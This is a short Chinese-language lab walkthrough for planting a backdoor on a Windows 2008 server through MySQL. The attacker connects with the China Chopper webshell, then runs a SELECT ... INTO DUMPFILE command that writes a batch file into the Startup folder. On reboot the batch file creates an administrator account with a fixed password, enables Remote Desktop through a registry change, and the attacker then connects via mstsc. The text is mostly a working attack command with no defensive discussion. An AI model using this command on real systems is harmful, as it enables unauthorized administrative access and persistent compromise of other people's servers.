实验环境:windows2008、物理机
实验原理:利用Mysql,将后门写入开机自启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器。(这个要求mysql的权限就很高,至少是管理员权限,甚至是system),该实验只能在windows中使用
实验步骤:
一、利用中国菜刀连接win2008,并连接数据库
二、在数据库命令行写入命令:
select "net user cxr 123.com /add & net localgroup administrators cxr /add & REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" " into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"
成功在开机启动目录写入以下文件,并开启远程连接端口,当被攻击者开机启动时,自动执行该文件中的命令 :
三、进行远程连接操作
在物理机输入mstsc进行远程连接